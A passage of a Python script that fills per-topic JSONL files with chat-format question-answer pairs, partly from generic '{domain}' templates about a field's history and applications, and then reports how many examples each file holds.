    ("How has {domain} evolved historically and what are the key developments that shaped it?",
     "The history of {domain} reflects broader shifts in human understanding, available technology, and social organisation. Early contributions established the basic vocabulary and initial frameworks that later thinkers refined, challenged, or discarded in light of new evidence or better methods. Major breakthroughs typically occurred when investigators brought new tools to bear — whether empirical methods, formal mathematical frameworks, or powerful analogies from other disciplines — or when practical demands created pressure to systematise and improve existing approaches. The field has seen periods of consolidation (when a dominant paradigm organises research and practice) and revolution (when anomalies accumulate and a new framework emerges). Contemporary {domain} is characterised by greater interdisciplinarity, data-driven approaches, and an awareness of the social and ethical dimensions of the knowledge it produces."),
    ("What are the most important practical applications of {domain} in the modern world?",
     "{domain} has moved from a largely theoretical enterprise to one with profound practical consequences across multiple sectors. Its applications range from direct professional practice to informing policy decisions that affect millions of people. In industry, {domain} provides frameworks for solving complex problems more efficiently, reducing costs, and improving outcomes. In public life, it helps address challenges where rigorous thinking and systematic evidence outperform intuition or tradition. The most impactful applications combine domain expertise with an understanding of the human and organisational contexts in which solutions will be implemented — recognising that technically correct answers must also be practically workable and ethically sound. Emerging technologies are both creating new application domains and changing how the core methods of {domain} are pursued."),
]

data_dir = BASE / "data/upgrades"
total_written = 0

# Process upgrades with specific data
for up, domain_info in ALL_DOMAINS.items():
    if isinstance(domain_info, dict):
        domain_name = domain_info["name"]
        pairs = domain_info["pairs"]
    else:
        domain_name, pairs = domain_info

    jsonl = data_dir / f"upgrade_{up}.jsonl"
    existing = 0
    if jsonl.exists():
        existing = sum(1 for _ in open(jsonl))

    # Only add if we have fewer than 30 examples
    if existing >= 30:
        print(f"  upgrade_{up}: {existing} examples already — skipping")
        continue

    written = 0
    with open(jsonl, "a") as f:
        for q, a in pairs:
            f.write(json.dumps({"messages": [
                {"role": "user", "content": q},
                {"role": "assistant", "content": a}
            ]}, ensure_ascii=False) + "\n")
            written += 1
    total_written += written
    print(f"  upgrade_{up} ({domain_name}): added {written} examples (total: {existing + written})")

# Process generic domains
for up, domain_name in GENERIC_DOMAINS.items():
    jsonl = data_dir / f"upgrade_{up}.jsonl"
    existing = 0
    if jsonl.exists():
        existing = sum(1 for _ in open(jsonl))

    if existing >= 20:
        print(f"  upgrade_{up}: {existing} examples already — skipping")
        continue

    # Generate from template
    pairs = [(t[0].format(domain=domain_name), t[1].format(domain=domain_name)) for t in GENERIC_TEMPLATE]

    written = 0
    with open(jsonl, "a") as f:
        for q, a in pairs:
            f.write(json.dumps({"messages": [
                {"role": "user", "content": q},
                {"role": "assistant", "content": a}
            ]}, ensure_ascii=False) + "\n")
            written += 1
    total_written += written
    print(f"  upgrade_{up} ({domain_name}): added {written} examples (total: {existing + written})")

print(f"\n=== Data generation complete: {total_written} new examples written ===")

# ── 4. Final count ─────────────────────────────────────────────────────────────
print("\n=== Final example counts ===")
thin = []
for f in sorted(data_dir.glob("upgrade_*.jsonl")):
    up = f.stem.replace("upgrade_", "")
    count = sum(1 for _ in open(f))
    status = "✓" if count >= 10 else "⚠ THIN"
    if count < 10:
        thin.append(up)
    print(f"  {up:>4}: {count:>6} examples  {status}")

if thin:
    print(f"\nStill thin: {thin}")
else:
    print("\nAll upgrades have ≥10 examples ✓")
